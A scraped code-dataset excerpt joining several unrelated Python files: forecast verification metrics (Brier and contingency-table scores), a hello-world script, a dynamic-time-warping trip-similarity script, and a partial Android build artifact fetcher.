return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(fcst), 'float')
obs_mean = np.mean(obs)
"""
Break p into bins, and compute reliability. but save each reliability
value in an array the same size as fcst. In this way we do not need to do
a weighted average
"""
for i in range(0, len(self._edges) - 1):
I = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
if len(I) > 0:
obs_mean_I = np.mean(obs[I])
bs[I] = (fcst[I] - obs_mean_I) ** 2
return np.nanmean(bs)
def label(self, variable):
return self.name
class BsRes(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier score, resolution term"
description = "Brier score, resolution term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 1
orientation = 1
def __init__(self, num_edges=11):
self._edges = np.linspace(0, 1, num_edges)
self._edges[-1] = 1.001
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(fcst), 'float')
obs_mean = np.mean(obs)
for i in range(0, len(self._edges) - 1):
I = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
if len(I) > 0:
obs_mean_I = np.mean(obs[I])
bs[I] = (obs_mean_I - obs_mean) ** 2
return np.nanmean(bs)
def label(self, variable):
return self.name
class BsUnc(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier score, uncertainty term"
description = "Brier score, uncertainty term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = None
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
obs_mean = np.mean(obs)
bsunc = np.nanmean((obs_mean - obs)**2)
return bsunc
def label(self, variable):
return self.name
class Bss(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier skill score"
description = "Brier skill score"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 1
orientation = 1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nanmean((fcst - obs)**2)
obs_mean = np.mean(obs)
bsunc = np.nanmean((obs_mean - obs)**2)
if bsunc == 0:
bss = np.nan
else:
bss = (bsunc - bs) / bsunc
return bss
def label(self, variable):
return self.name
class QuantileScore(Metric):
type = verif.metric_type.Probabilistic()
name = "Quantile score"
description = "Quantile score. Use -q to set which quantiles to use."
min = 0
require_threshold_type = "quantile"
supports_threshold = True
perfect_score = 0
orientation = -1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, q] = get_q(data, input_index, axis, axis_index, interval)
qs = np.nan * np.zeros(len(q), 'float')
v = q - obs
qs = v * (interval.lower - (v < 0))
return np.mean(qs)
def label(self, variable):
return self.name
class Ign0(Metric):
type = verif.metric_type.Probabilistic()
name = "Binary ignorance"
description = "Ignorance of the binary probability based on threshold"
require_threshold_type = "threshold"
supports_threshold = True
orientation = -1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
I0 = np.where(obsP == 0)[0]
I1 = np.where(obsP == 1)[0]
ign = -np.log2(p)
ign[I0] = -np.log2(1 - p[I0])
return np.mean(ign)
def label(self, variable):
return self.name
class Spherical(Metric):
type = verif.metric_type.Probabilistic()
name = "Spherical score"
description = "Spherical probabilistic scoring rule for binary events"
require_threshold_type = "threshold"
supports_threshold = True
max = 1
min = 0
perfect_score = 1
orientation = 1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
I0 = np.where(obsP == 0)[0]
I1 = np.where(obsP == 1)[0]
sp = p / np.sqrt(p ** 2 + (1 - p) ** 2)
sp[I0] = (1 - p[I0]) / np.sqrt((p[I0]) ** 2 + (1 - p[I0]) ** 2)
return np.mean(sp)
def label(self, variable):
return self.name
class Contingency(Metric):
"""
Metrics based on 2x2 contingency table for a given interval. Observations
and forecasts are converted into binary values, that is if they are within
or not within an interval.
"""
type = verif.metric_type.Threshold()
min = 0
max = 1
default_axis = verif.axis.Threshold()
require_threshold_type = "deterministic"
supports_threshold = True
_usingQuantiles = False
def compute_from_abcd(self, a, b, c, d):
""" Compute the score given the 4 values in the 2x2 contingency table:
Arguments:
a (float): Hit
b (float): False alarm
c (float): Miss
d (float): Correct rejection
Returns:
float: The score
"""
raise NotImplementedError()
def label(self, variable):
return self.name
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(), verif.field.Fcst()], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def _quantile_to_threshold(self, values, interval):
"""
Convert an interval of quantiles to interval thresholds, for example
converting [10%, 50%] of some precip values to [5 mm, 25 mm]
Arguments:
values (np.array): values to compute thresholds for
interval (verif.interval.Interval): interval of quantiles
Returns:
verif.interval.Interval: Interval of thresholds
"""
sorted = np.sort(values)
lower = -np.inf
upper = np.inf
if not np.isinf(abs(interval.lower)):
lower = np.percentile(sorted, interval.lower * 100)
if not np.isinf(abs(interval.lower)):
upper = np.percentile(sorted, interval.upper * 100)
return verif.interval.Interval(lower, upper, interval.lower_eq, interval.upper_eq)
def _compute_abcd(self, obs, fcst, interval, f_interval=None):
if f_interval is None:
f_interval = interval
value = np.nan
if len(fcst) > 0:
# Compute frequencies
if self._usingQuantiles:
fcstSort = np.sort(fcst)
obsSort = np.sort(obs)
f_qinterval = self._quantile_to_threshold(fcstSort, f_interval)
o_qinterval = self._quantile_to_threshold(obsSort, interval)
a = np.ma.sum(f_qinterval.within(fcst) & o_qinterval.within(obs)) # Hit
b = np.ma.sum(f_qinterval.within(fcst) & (o_qinterval.within(obs) == 0)) # FA
c = np.ma.sum((f_qinterval.within(fcst) == 0) & o_qinterval.within(obs)) # Miss
d = np.ma.sum((f_qinterval.within(fcst) == 0) & (o_qinterval.within(obs) == 0)) # CR
else:
a = np.ma.sum(f_interval.within(fcst) & interval.within(obs)) # Hit
b = np.ma.sum(f_interval.within(fcst) & (interval.within(obs) == 0)) # FA
c = np.ma.sum((f_interval.within(fcst) == 0) & interval.within(obs)) # Miss
d = np.ma.sum((f_interval.within(fcst) == 0) & (interval.within(obs) == 0)) # CR
return [a, b, c, d]
def compute_from_obs_fcst(self, obs, fcst, interval, f_interval=None):
""" Computes the score
Arguments:
obs (np.array): array of observations
fcst (np.array): array of forecasts
interval (verif.interval.Interval): compute score for this interval
f_interval (verif.interval.Interval): Use this interval for forecasts.
If None, then use the same interval for obs and forecasts.
Returns:
float: The score
"""
[a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)
value = self.compute_from_abcd(a, b, c, d)
if np.isinf(value):
value = np.nan
return value
def compute_from_obs_fcst_resample(self, obs, fcst, N, interval, f_interval=None):
"""
Same as compute_from_obs_fcst, except compute more robust scores by
resampling (with replacement) using the computed values of a, b, c, d.
Arguments:
obs (np.array): array of observations
fcst (np.array): array of forecasts
N (int): Resample this many times
interval (verif.interval.Interval): compute score for this interval
f_interval (verif.interval.Interval): Use this interval for forecasts.
If None, then use the same interval for obs and forecasts.
Returns:
float: The score
"""
[a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)
# Resample
n = a + b + c + d
np.random.seed(1)
value = 0
for i in range(0, N):
aa = np.random.binomial(n, 1.0*a/n)
bb = np.random.binomial(n, 1.0*b/n)
cc = np.random.binomial(n, 1.0*c/n)
dd = np.random.binomial(n, 1.0*d/n)
value = value + self.compute_from_abcd(aa, bb, cc, dd)
value = value / N
return value
def label(self, variable):
return self.name
class A(Contingency):
name = "Hit"
description = "Hit"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * a / (a + b + c + d)
class B(Contingency):
name = "False alarm"
description = "False alarm"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * b / (a + b + c + d)
class C(Contingency):
name = "Miss"
description = "Miss"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * c / (a + b + c + d)
class D(Contingency):
name = "Correct rejection"
description = "Correct rejection"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * d / (a + b + c + d)
class N(Contingency):
name = "Total cases"
description = "Total cases"
max = None
def compute_from_abcd(self, a, b, c, d):
return a + b + c + d
class Ets(Contingency):
name = "Equitable threat score"
description = "Equitable threat score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
ar = (a + b) / 1.0 / N * (a + c)
if a + b + c - ar == 0:
return np.nan
return (a - ar) / 1.0 / (a + b + c - ar)
def label(self, variable):
return "ETS"
class FcstRate(Contingency):
name = "Forecast rate"
description = "Fractions of forecasts (a + b)"
perfect_score = None
orientation = 0
def compute_from_abcd(self, a, b, c, d):
return (a + b) / 1.0 / (a + b + c + d)
class Dscore(Contingency):
name = "Discimination"
description = "Generalized discrimination score"
perfect_score = 1
orientation = 1
reference = "Simon J. Mason and Andreas P. Weigel, 2009: A Generic Forecast Verification Framework for Administrative Purposes. Mon. Wea. Rev., 137, 331-349."
max = 1
min = 0
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
num = a*d + 0.5*(a*b + c*d)
denom = (a + c) * (b + d)
if denom == 0:
return np.nan
return num / denom
class Threat(Contingency):
name = "Threat score"
description = "Threat score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a + b + c == 0:
return np.nan
return a / 1.0 / (a + b + c)
class Pc(Contingency):
name = "Proportion correct"
description = "Proportion correct"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
return (a + d) / 1.0 / (a + b + c + d)
class Edi(Contingency):
name = "Extremal dependency index"
description = "Extremal dependency index"
perfect_score = 1
orientation = 1
reference = "Christopher A. T. Ferro and David B. Stephenson, 2011: Extremal Dependence Indices: Improved Verification Measures for Deterministic Forecasts of Rare Binary Events. Wea. Forecasting, 26, 699-713."
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if b + d == 0 or a + c == 0:
return np.nan
F = b / 1.0 / (b + d)
H = a / 1.0 / (a + c)
if H == 0 or F == 0:
return np.nan
denom = (np.log(H) + np.log(F))
if denom == 0:
return np.nan
return (np.log(F) - np.log(H)) / denom
def label(self, variable):
return "EDI"
class Sedi(Contingency):
name = "Symmetric extremal dependency index"
description = "Symmetric extremal dependency index"
perfect_score = 1
orientation = 1
reference = Edi.reference
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if b + d == 0 or a + c == 0:
return np.nan
F = b / 1.0 / (b + d)
H = a / 1.0 / (a + c)
if F == 0 or F == 1 or H == 0 or H == 1:
return np.nan
denom = np.log(F) + np.log(H) + np.log(1 - F) + np.log(1 - H)
if denom == 0:
return np.nan
num = np.log(F) - np.log(H) - np.log(1 - F) + np.log(1 - H)
return num / denom
def label(self, variable):
return "SEDI"
class Eds(Contingency):
name = "Extreme dependency score"
description = "Extreme dependency score"
min = None
perfect_score = 1
orientation = 1
reference = "Stephenson, D. B., B. Casati, C. A. T. Ferro, and C. A. Wilson, 2008: The extreme dependency score: A non-vanishing measure for forecasts of rare events. Meteor. Appl., 15, 41-50."
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if a + c == 0:
return np.nan
H = a / 1.0 / (a + c)
p = (a + c) / 1.0 / N
if H == 0 or p == 0:
return np.nan
denom = (np.log(p) + np.log(H))
if denom == 0:
return np.nan
return (np.log(p) - np.log(H)) / denom
def label(self, variable):
return "EDS"
class Seds(Contingency):
name = "Symmetric extreme dependency score"
description = "Symmetric extreme dependency score"
min = None
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if a + c == 0:
return np.nan
H = a / 1.0 / (a + c)
p = (a + c) / 1.0 / N
q = (a + b) / 1.0 / N
if q == 0 or H == 0:
return np.nan
denom = np.log(p) + np.log(H)
if denom == 0:
return np.nan
return (np.log(q) - np.log(H)) / (np.log(p) + np.log(H))
def label(self, variable):
return "SEDS"
class BiasFreq(Contingency):
name = "Bias frequency"
description = "Bias frequency (number of fcsts / number of obs)"
max = None
perfect_score = 1
orientation = 0
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return 1.0 * (a + b) / (a + c)
class Hss(Contingency):
max = None
description = "Heidke skill score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
denom = ((a + c) * (c + d) + (a + b) * (b + d))
if denom == 0:
return np.nan
return 2.0 * (a * d - b * c) / denom
class BaseRate(Contingency):
name = "Base rate"
description = "Base rate: Fraction of observations (a + c)"
perfect_score = None
orientation = 0
def compute_from_abcd(self, a, b, c, d):
if a + b + c + d == 0:
return np.nan
return (a + c) / 1.0 / (a + b + c + d)
class Or(Contingency):
name = "Odds ratio"
description = "Odds ratio"
max = None
perfect_score = None # Should be infinity
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if b * c == 0:
return np.nan
return (a * d) / 1.0 / (b * c)
class Lor(Contingency):
name = "Log odds ratio"
description = "Log odds ratio"
max = None
perfect_score = None # Should be infinity
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a * d == 0 or b * c == 0:
return np.nan
return np.log((a * d) / 1.0 / (b * c))
class YulesQ(Contingency):
name = "Yule's Q"
description = "Yule's Q (Odds ratio skill score)"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a * d + b * c == 0:
return np.nan
return (a * d - b * c) / 1.0 / (a * d + b * c)
class Kss(Contingency):
name = "Hanssen-Kuiper skill score"
description = "Hanssen-Kuiper skill score"
perfect_score = 1
orientation = 1
reference = "Hanssen , A., W. Kuipers, 1965: On the relationship between the frequency of rain and various meteorological parameters. - Meded. Verh. 81, 2-15."
def compute_from_abcd(self, a, b, c, d):
if (a + c) * (b + d) == 0:
return np.nan
return (a * d - b * c) * 1.0 / ((a + c) * (b + d))
class Hit(Contingency):
name = "Hit rate"
description = "Hit rate (a.k.a. probability of detection)"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return a / 1.0 / (a + c)
class Miss(Contingency):
name = "Miss rate"
description = "Miss rate"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return c / 1.0 / (a + c)
# Fraction of non-events that are forecasted as events
class Fa(Contingency):
name = "False alarm rate"
description = "False alarm rate"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if b + d == 0:
return np.nan
return b / 1.0 / (b + d)
# Fraction of forecasted events that are false alarms
class Far(Contingency):
name = "False alarm ratio"
description = "False alarm ratio"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if a + b == 0:
return np.nan
return b / 1.0 / (a + b)
| [
"tnipen@gmail.com"
] | tnipen@gmail.com |
01a5db57895c627d4f4362a14b97c9cfaf4afbb9 | 5921824c554cfa26c69b8aaa8c4e7cbff4ed06f7 | /hello.py | 926ce1b515353e86659548257f6ab8b1e442339e | [] | no_license | Robbiesmalls/sample | d4e59d1b59c3bb9f6b313fa11131496128b8bf6a | 89e330c6387a7223b4cc11381b318d8f9c58386f | refs/heads/master | 2020-04-25T11:54:34.001253 | 2019-02-26T17:48:13 | 2019-02-26T17:48:13 | 172,760,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py | def hello_world():
print("hello guys")
def hello_steve():
print('hello steve')
| [
"drj@ool-ad020142.dyn.optonline.net"
] | drj@ool-ad020142.dyn.optonline.net |
953809a2bf985cd1146dd41176b21eb54db687e8 | 05eae99986fa20dfcda910e55de60b179b8aa870 | /Code/bitte90.py | 08386480ac534198ba3f5af3c1d2f8011db994f8 | [] | no_license | caigaojiang/awesome-kagg-ml | e4f8809b287361a8637c4d13b0c4211f879726cc | 7825a502111c2f8517e4ba2909cc95ef3758a2e9 | refs/heads/master | 2020-12-28T22:23:20.051872 | 2016-04-10T12:22:41 | 2016-04-10T12:22:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,647 | py | from __future__ import division
import sys
import collections
import itertools
from scipy.stats import mode
import pandas as pd
import numpy as np
from os import listdir, path
import multiprocessing as mp
import h5py
try:
from IPython.display import clear_output
have_ipython = True
except ImportError:
have_ipython = False
class KnnDtw(object):
"""K-nearest neighbor classifier using dynamic time warping
as the distance measure between pairs of time series arrays
Arguments
---------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for KNN
max_warping_window : int, optional (default = infinity)
Maximum warping window allowed by the DTW dynamic
programming function
subsample_step : int, optional (default = 1)
Step size for the timeseries array. By setting subsample_step = 2,
the timeseries length will be reduced by 50% because every second
item is skipped. Implemented by x[:, ::subsample_step]
"""
def __init__(self, n_neighbors=1, max_warping_window=50, subsample_step=20):
self.n_neighbors = n_neighbors
self.max_warping_window = max_warping_window
self.subsample_step = subsample_step
def fit(self, x, l):
"""Fit the model using x as training data and l as class labels
Arguments
---------
x : array of shape [n_samples, n_timepoints]
Training data set for input into KNN classifer
l : array of shape [n_samples]
Training labels for input into KNN classifier
"""
self.x = x
self.l = l
def _dtw_distance(self, ts_a, ts_b, d = lambda x,y: abs(x-y)):
"""Returns the DTW similarity distance between two 2-D
timeseries numpy arrays.
Arguments
---------
ts_a, ts_b : array of shape [n_samples, n_timepoints]
Two arrays containing n_samples of timeseries data
whose DTW distance between each sample of A and B
will be compared
d : DistanceMetric object (default = abs(x-y))
the distance measure used for A_i - B_j in the
DTW dynamic programming function
Returns
-------
DTW distance between A and B
"""
# Create cost matrix via broadcasting with large int
ts_a, ts_b = np.array(ts_a), np.array(ts_b)
M, N = len(ts_a), len(ts_b)
cost = sys.maxint * np.ones((M, N))
# Initialize the first row and column
cost[0, 0] = d(ts_a[0], ts_b[0])
for i in xrange(1, M):
cost[i, 0] = cost[i-1, 0] + d(ts_a[i], ts_b[0])
for j in xrange(1, N):
cost[0, j] = cost[0, j-1] + d(ts_a[0], ts_b[j])
# Populate rest of cost matrix within window
for i in xrange(1, M):
for j in xrange(max(1, i - self.max_warping_window),
min(N, i + self.max_warping_window)):
choices = cost[i - 1, j - 1], cost[i, j-1], cost[i-1, j]
cost[i, j] = min(choices) + d(ts_a[i], ts_b[j])
# Return DTW distance given window
return cost[-1, -1]
def _dist_matrix(self, x, y):
"""Computes the M x N distance matrix between the training
dataset and testing dataset (y) using the DTW distance measure
Arguments
---------
x : array of shape [n_samples, n_timepoints]
y : array of shape [n_samples, n_timepoints]
Returns
-------
Distance matrix between each item of x and y with
shape [training_n_samples, testing_n_samples]
"""
# Compute the distance matrix
dm_count = 0
# Compute condensed distance matrix (upper triangle) of pairwise dtw distances
# when x and y are the same array
if(np.array_equal(x, y)):
x_s = shape(x)
dm = np.zeros((x_s[0] * (x_s[0] - 1)) // 2, dtype=np.double)
p = ProgressBar(shape(dm)[0])
for i in xrange(0, x_s[0] - 1):
for j in xrange(i + 1, x_s[0]):
dm[dm_count] = self._dtw_distance(x[i, ::self.subsample_step],
y[j, ::self.subsample_step])
dm_count += 1
p.animate(dm_count)
# Convert to squareform
dm = squareform(dm)
return dm
# Compute full distance matrix of dtw distnces between x and y
else:
x_s = np.shape(x)
y_s = np.shape(y)
dm = np.zeros((x_s[0], y_s[0]))
dm_size = x_s[0]*y_s[0]
p = ProgressBar(dm_size)
for i in xrange(0, x_s[0]):
for j in xrange(0, y_s[0]):
dm[i, j] = self._dtw_distance(x[i, ::self.subsample_step],
y[j, ::self.subsample_step])
# Update progress bar
dm_count += 1
p.animate(dm_count)
return dm
def predict(self, x):
"""Predict the class labels or probability estimates for
the provided data
Arguments
---------
x : array of shape [n_samples, n_timepoints]
Array containing the testing data set to be classified
Returns
-------
2 arrays representing:
(1) the predicted class labels
(2) the knn label count probability
"""
dm = self._dist_matrix(x, self.x)
# Identify the k nearest neighbors
knn_idx = dm.argsort()[:, :self.n_neighbors]
# Identify k nearest labels
knn_labels = self.l[knn_idx]
# Model Label
mode_data = mode(knn_labels, axis=1)
mode_label = mode_data[0]
mode_proba = mode_data[1]/self.n_neighbors
return mode_label.ravel(), mode_proba.ravel()
class ProgressBar:
"""This progress bar was taken from PYMC
"""
def __init__(self, iterations):
self.iterations = iterations
self.prog_bar = '[]'
self.fill_char = '*'
self.width = 40
self.__update_amount(0)
if have_ipython:
self.animate = self.animate_ipython
else:
self.animate = self.animate_noipython
def animate_ipython(self, iter):
print '\r', self,
sys.stdout.flush()
self.update_iteration(iter + 1)
def update_iteration(self, elapsed_iter):
self.__update_amount((elapsed_iter / float(self.iterations)) * 100.0)
self.prog_bar += ' %d of %s complete' % (elapsed_iter, self.iterations)
def __update_amount(self, new_amount):
percent_done = int(round((new_amount / 100.0) * 100.0))
all_full = self.width - 2
num_hashes = int(round((percent_done / 100.0) * all_full))
self.prog_bar = '[' + self.fill_char * num_hashes + ' ' * (all_full - num_hashes) + ']'
pct_place = (len(self.prog_bar) // 2) - len(str(percent_done))
pct_string = '%d%%' % percent_done
self.prog_bar = self.prog_bar[0:pct_place] + \
(pct_string + self.prog_bar[pct_place + len(pct_string):])
def __str__(self):
return str(self.prog_bar)
##################################################
def rotational(theta):
# http://en.wikipedia.org/wiki/Rotation_matrix
# Beyond rotation matrix, fliping, scaling, shear can be combined into a single affine transform
# http://en.wikipedia.org/wiki/Affine_transformation#mediaviewer/File:2D_affine_transformation_matrix.svg
return np.array([[-np.sin(theta), np.cos(theta)], [np.cos(theta), np.sin(theta)]])
def flip(x):
# flip a trip if more that half of coordinates have y axis value above 0
if np.sign(x[:,1]).sum() > 0:
x = x.dot(np.array([[1,0],[0,-1]]))
return pd.DataFrame(x, columns=['x', 'y'])
def rotate_trip(trip):
# take last element
a=trip.iloc[-1]
# get the degree to rotate
w0=np.arctan2(a.y,a.x) # from origin to last element angle
# rotate using the rotational: equivalent to rotational(-w0).dot(trip.T).T
return np.array(trip.dot(rotational(w0)))
def do_job(i, chunk):
df = pd.read_hdf(path.join(chunk_path, chunk), key = 'table')
for driver, trips in df.groupby(level = ['Driver']):
print('driver is ')
print(driver)
sims = similarity_trips(trips)
h5f = h5py.File(matched_trips_path + 'data-{}.h5'.format(driver), 'w')
h5f.create_dataset('dataset_{}'.format(driver), data=sims)
h5f.close()
def similarity_trips(trips):
m = KnnDtw(n_neighbors = 1, max_warping_window=50, subsample_step=10)
sim = np.zeros((201, 201))
for trip_num, trip in trips.groupby(level = ['Trip']):
print(trip_num)
if int(trip_num) != 1: continue
for other_trip_num, other_trip in trips.groupby(level = ['Trip']):
if (int (trip_num) != int(other_trip_num)) or (sim[trip_num, other_trip_num] == 0):
print(other_trip_num)
trip1 = flip(rotate_trip(trip))
trip2 = flip(rotate_trip(other_trip))
distance = m._dtw_distance(trip1.values,
trip2.values,
d = lambda x,y: np.linalg.norm(x-y))
sim[trip_num, other_trip_num] = distance
sim[other_trip_num, trip_num] = distance
if int(other_trip_num) == 200: break
break
print(np.min(sim))
non_zero_mask = sim[1, :] != 0
first_row = sim[1, :]
non_zero = first_row[non_zero_mask]
sim = 1 - (np.max(non_zero) / sim)
print(sim)
first_row = sim[1, :]
print(zip(np.arange(201), first_row))
return sim
# Chunks (containing parts of the mega df)
chunk_path = "/scratch/vstrobel/chunks32_small/"
matched_trips_path = "/scratch/vstrobel/matched_dtw/"
chunks = sorted(listdir(chunk_path))
def main():
jobs = []
print(chunks[:1])
for i, chunk in enumerate(chunks[:1]):
p = mp.Process(target = do_job, args = (i,chunk, ))
jobs.append(p)
p.start()
if __name__ == "__main__":
main()
| [
"vstrobel@cn89.science.ru.nl"
] | vstrobel@cn89.science.ru.nl |
e188217cf5dcdf7b3d1b7887be7a21f67e80e4ab | 544cfadc742536618168fc80a5bd81a35a5f2c99 | /tools/treble/fetcher/fetcher_lib.py | 0ec017318832788f675ab4ad2587b17824faa6f9 | [
"Apache-2.0"
] | permissive | ZYHGOD-1/Aosp11 | 0400619993b559bf4380db2da0addfa9cccd698d | 78a61ca023cbf1a0cecfef8b97df2b274ac3a988 | refs/heads/main | 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,512 | py | """Provides helper functions for fetching artifacts."""
import io
import os
import re
import sys
import sysconfig
import time
# This is a workaround to put '/usr/lib/python3.X' ahead of googleapiclient
# Using embedded_launcher won't work since py3-cmd doesn't contain _ssl module.
if sys.version_info.major == 3:
sys.path.insert(0, os.path.dirname(sysconfig.get_paths()['purelib']))
# pylint: disable=import-error,g-bad-import-order,g-import-not-at-top
import apiclient
from googleapiclient.discovery import build
from six.moves import http_client
import httplib2
from oauth2client.service_account import ServiceAccountCredentials
_SCOPE_URL = 'https://www.googleapis.com/auth/androidbuild.internal'
_DEF_JSON_KEYFILE = '.config/gcloud/application_default_credentials.json'
# 20 MB default chunk size -- used in Buildbot
_DEFAULT_CHUNK_SIZE = 20 * 1024 * 1024
# HTTP errors -- used in Builbot
_DEFAULT_MASKED_ERRORS = [404]
_DEFAULT_RETRIED_ERRORS = [503]
_DEFAULT_RETRIES = 10
def _create_http_from_p12(robot_credentials_file, robot_username):
"""Creates a credentialed HTTP object for requests.
Args:
robot_credentials_file: The path to the robot credentials file.
robot_username: A string containing the username of the robot account.
Returns:
An authorized httplib2.Http object.
"""
try:
credentials = ServiceAccountCredentials.from_p12_keyfile(
service_account_email=robot_username,
filename=robot_credentials_file,
scopes=_SCOPE_URL)
except AttributeError:
raise ValueError('Machine lacks openssl or pycrypto support')
http = httplib2.Http()
return credentials.authorize(http)
def _simple_execute(http_request,
masked_errors=None,
retried_errors=None,
retry_delay_seconds=5,
max_tries=_DEFAULT_RETRIES):
"""Execute http request and return None on specified errors.
Args:
http_request: the apiclient provided http request
masked_errors: list of errors to return None on
retried_errors: list of erros to retry the request on
retry_delay_seconds: how many seconds to sleep before retrying
max_tries: maximum number of attmpts to make request
Returns:
The result on success or None on masked errors.
"""
if not masked_errors:
masked_errors = _DEFAULT_MASKED_ERRORS
if not retried_errors:
retried_errors = _DEFAULT_RETRIED_ERRORS
last_error = None
for _ in range(max_tries):
try:
return http_request.execute()
except http_client.errors.HttpError as e:
last_error = e
if e.resp.status in masked_errors:
return None
elif e.resp.status in retried_errors:
time.sleep(retry_delay_seconds)
else:
# Server Error is server error
raise e
# We've gone through the max_retries, raise the last error
raise last_error # pylint: disable=raising-bad-type
def create_client(http):
"""Creates an Android build api client from an authorized http object.
Args:
http: An authorized httplib2.Http object.
Returns:
An authorized android build api client.
"""
return build(serviceName='androidbuildinternal', version='v2beta1', http=http)
def create_client_from_json_keyfile(json_keyfile_name=None):
"""Creates an Android build api client from a json keyfile.
Args:
json_keyfile_name: The location of the keyfile, if None is provided use
default location.
Returns:
An authorized android build api client.
"""
if not json_keyfile_name:
json_keyfile_name = os.path.join(os.getenv('HOME'), _DEF_JSON_KEYFILE)
credentials = ServiceAccountCredentials.from_json_keyfile_name(
filename=json_keyfile_name, scopes=_SCOPE_URL)
http = httplib2.Http()
credentials.authorize(http)
return create_client(http)
def create_client_from_p12(robot_credentials_file, robot_username):
"""Creates an Android build api client from a config file.
Args:
robot_credentials_file: The path to the robot credentials file.
robot_username: A string containing the username of the robot account.
Returns:
An authorized android build api client.
"""
http = _create_http_from_p12(robot_credentials_file, robot_username)
return create_client(http)
def fetch_artifact(client, build_id, target, resource_id, dest):
"""Fetches an artifact.
Args:
client: An authorized android build api client.
build_id: AB build id
target: the target name to download from
resource_id: the resource id of the artifact
dest: path to store the artifact
"""
out_dir = os.path.dirname(dest)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
dl_req = client.buildartifact().get_media(
buildId=build_id,
target=target,
attemptId='latest',
resourceId=resource_id)
print('Fetching %s to %s...' % (resource_id, dest))
with io.FileIO(dest, mode='wb') as fh:
downloader = apiclient.http.MediaIoBaseDownload(
fh, dl_req, chunksize=_DEFAULT_CHUNK_SIZE)
done = False
while not done:
status, done = downloader.next_chunk(num_retries=_DEFAULT_RETRIES)
print('Fetching...' + str(status.progress() * 100))
print('Done Fetching %s to %s' % (resource_id, dest))
def get_build_list(client, **kwargs):
"""Get a list of builds from the android build api that matches parameters.
Args:
client: An authorized android build api client.
**kwargs: keyworded arguments to pass to build api.
Returns:
Response from build api.
"""
build_request = client.build().list(**kwargs)
return _simple_execute(build_request)
def list_artifacts(client, regex, **kwargs):
"""List artifacts from the android build api that matches parameters.
Args:
client: An authorized android build api client.
regex: Regular expression pattern to match artifact name.
**kwargs: keyworded arguments to pass to buildartifact.list api.
Returns:
List of matching artifact names.
"""
matching_artifacts = []
kwargs.setdefault('attemptId', 'latest')
regex = re.compile(regex)
req = client.buildartifact().list(**kwargs)
while req:
result = _simple_execute(req)
if result and 'artifacts' in result:
for a in result['artifacts']:
if regex.match(a['name']):
matching_artifacts.append(a['name'])
req = client.buildartifact().list_next(req, result)
return matching_artifacts
def fetch_artifacts(client, out_dir, target, pattern, build_id):
"""Fetches target files artifacts matching patterns.
Args:
client: An authorized instance of an android build api client for making
requests.
out_dir: The directory to store the fetched artifacts to.
target: The target name to download from.
pattern: A regex pattern to match to artifacts filename.
build_id: The Android Build id.
"""
if not os.path.exists(out_dir):
os.makedirs(out_dir)
# Build a list of needed artifacts
artifacts = list_artifacts(
client=client,
regex=pattern,
buildId=build_id,
target=target)
for artifact in artifacts:
fetch_artifact(
client=client,
build_id=build_id,
target=target,
